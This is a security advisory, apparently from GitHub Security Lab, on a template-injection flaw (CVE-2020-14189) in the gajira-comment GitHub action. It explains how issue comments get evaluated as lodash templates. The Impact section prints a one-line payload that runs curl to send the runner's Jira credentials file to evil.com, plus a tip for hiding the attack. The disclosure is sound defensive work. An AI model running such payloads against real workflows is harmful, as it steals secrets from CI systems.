Summary
The gajira-comment GitHub action isupports undocumented template syntax that may lead to arbitrary code execution.
Product
Tested Version
2.0.1
Details
Issue: The potentially untrusted input value comment
is evaluated as code by node.js
The action supports additional template transformation of the comment
input value - all placeholders between double braces like {{event.issue.body}}
are replaced with the according values from github.event
context. The intention most probably was to use it like:
uses: atlassian/gajira-comment@v2.0.1
with:
comment: |
Comment created by {{ event.comment.user.login }}
{{ event.comment.body }}
i.e. without the dollar sign and the root github
context object.
However this feature is not documented and the built-in GitHub context expressions are used by the users of the action instead, like:
uses: atlassian/gajira-comment@v2.0.1
with:
comment: |
${{ github.event.comment.body }}
This may lead to a double template evaluation if the user input contains {{}}
itself. A public issue in a similar action was created by one of the action users that proves it does happen.
The internal template feature is implemented in a way that the user input is interpreted as javascript:
const _ = require('lodash')
const rawComment = this.argv.comment
_.templateSettings.interpolate = /{{([\s\S]+?)}}/g
const compiled = _.template(rawComment)
const interpolatedComment = compiled({ event: this.githubEvent })
Impact
This vulnerability allows for arbitrary code execution in the context of a GitHub runner. For example a user may create a comment with the body
{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}
which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the comment to Never mind my bad.
and close it.
CVE
CVE-2020-14189
Coordinated Disclosure Timeline
- 10/14/2020: Report sent to vendor
- 10/14/2020: Vendor acknowledges report receipt
- 10/21/2020: Issue fixed in v2.0.2
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2020-173
in any communication regarding this issue.